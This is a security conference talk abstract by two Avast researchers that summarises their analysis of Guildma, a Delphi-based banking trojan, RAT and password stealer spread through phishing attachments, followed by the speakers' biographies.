Guildma: timers sent from hell

Adolf Středa, Luigino Camastra/AVAST

For several months now, we have been tracking a malware campaign called Guildma. Guildma is powerful combination of a RAT (remote access tool), spyware, password stealer and banker malware, mainly distributed via malicious attachments in phishing emails.

The cybercriminals behind Guildma have primarily focused on targeting Brazilian users and services, but since May 2019 they have expanded their range and are now targeting more than 130 banks and 75 other web services around the world.

The infection is spread by emails posing as invoices, tax reports, invitations and other similar formats with an attachment, more specifically a ZIP archive containing a malicious LNK file. This file is used to fetch the first loader, which retrieves all the remaining modules. After several layers of loaders, a core module is launched. The core module then begins fingerprinting the system and monitoring launched applications. If a targeted application is launched, basic information is extracted from it and other modules are either loaded or injected. Two of these modules are Nirsoft’s password recovery tools, and two additional modules provide RAT, keylogging, and data exfiltration functionality. The remaining modules interestingly facilitate mass-mailing, form-grabbing and an email-client data crawler.

All the binary modules are written in Delphi and heavily rely on the usage of timers. These timers are often very interdependent and use other controls, such as labels or buttons, to pass information between themselves. Some of these modules also create various files that are used to pass data between modules or to indicate that a targeted application has been found.

In our analysis, we present the infection process and a detailed description of Guildma’s modules. As the structure of modules and their relations are very complex, we aim to provide a high-level overview augmented by interesting technical details. Due to the extensive time period covered by this research, we can also provide details about the evolution of Guildma.

November 7 at 15:00 - 15:30, Stage B

Adolf Středa is a Reverse Engineer at Avast. He specializes in botnets, more specifically botnet communication analysis and information extraction. He is also a PhD student at the Faculty of Mathematics and Physics of the Charles University in Prague, Czech Republic, specializing in cryptography. So far, he has presented his research at SantaCrypt, AVAR, Botconf, and Virus Bulletin.

Luigino Camastra is a Malware Researcher at Avast. His main specialization is reverse engineering of PE files, identifying malware families, and writing detections rules. He is mainly interested in researching new malware families. Currently, he is a master degree student at Faculty of Information Technology at Czech Technical University with the specialization in IT security. So far, he has presented his research at APWG.